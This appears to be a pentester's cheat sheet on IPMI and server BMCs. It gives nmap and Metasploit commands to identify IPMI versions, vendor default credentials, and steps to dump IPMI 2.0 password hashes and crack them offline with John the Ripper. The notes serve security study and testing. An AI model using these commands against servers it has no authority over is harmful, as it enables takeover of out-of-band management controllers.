Intelligent Platform Management Interface (IPMI) is a protocol used by system administrators to manage computers.

It's an out-of-band protocol so it works even if the system is turned off or unresponsive. It's independent and works independently of the CPU, BIOS, memory, firmware, and operating system.

🐊️ Port: 623 (UDP)

It can be used to monitor components such as temperature, voltage, fans, and power supplies. A system utilizing IPMI version 2.0 can be managed from a console via a serial connection.

IPMI requires multiple components (BMC, ICMB, IPMB, etc.). BMCs are controlling the motherboard. The most common ones are:

  • Supermicro
  • HPE iLO (formerly HP iLO)
  • Dell DRAC
  • Aspeed AST
  • ...

IPMI Pentester Notes ☠️

If we gain access to a BMC, we can monitor, reboot, power off, or reinstall the operating system.

  • We can use nmap to find the IPMI version
$ nmap -sU --script ipmi-version -p 623 IP
$ msfconsole -q
msf6> use auxiliary/scanner/ipmi/ipmi_version 
msf6> set RHOSTS IP
msf6> run

Default Passwords

  • ADMIN:ADMIN (Supermicro)
  • Administrator:[A-Z0-9]{8} (HPE iLO)
  • root:calvin (Dell DRAC)

A flaw in IPMI 2.0 leads to the password hash being returned before authenticating. It can then be cracked offline.

$ msfconsole -q
msf6> use auxiliary/scanner/ipmi/ipmi_dumphashes
msf6> set RHOSTS IP
msf6> set OUTPUT_JOHN_FILE pjohn
msf6> run
msf6> exit
$ john pjohn -w /usr/share/metasploit-framework/data/wordlists/ipmi_passwords.txt